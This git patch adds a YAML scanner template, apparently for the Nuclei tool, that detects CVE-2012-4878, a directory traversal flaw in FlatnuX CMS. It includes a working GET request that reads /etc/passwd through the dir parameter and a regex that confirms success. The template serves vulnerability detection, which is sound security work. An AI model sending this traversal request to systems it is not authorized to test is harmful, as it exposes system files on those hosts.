From 241eff959cc827bcd22b387c823177a7ebdfbb96 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:31:04 +0700 Subject: [PATCH] Create CVE-2012-4878.yaml --- cves/2012/CVE-2012-4878.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2012/CVE-2012-4878.yaml diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml new file mode 100644 index 0000000000..79bf5f60d2 --- /dev/null +++ b/cves/2012/CVE-2012-4878.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-4878 + +info: + name: FlatnuX CMS - Directory Traversal + author: daffainfo + severity: high + description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + reference: | + - https://www.exploit-db.com/exploits/37034 + - https://www.cvedetails.com/cve/CVE-2012-4878 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200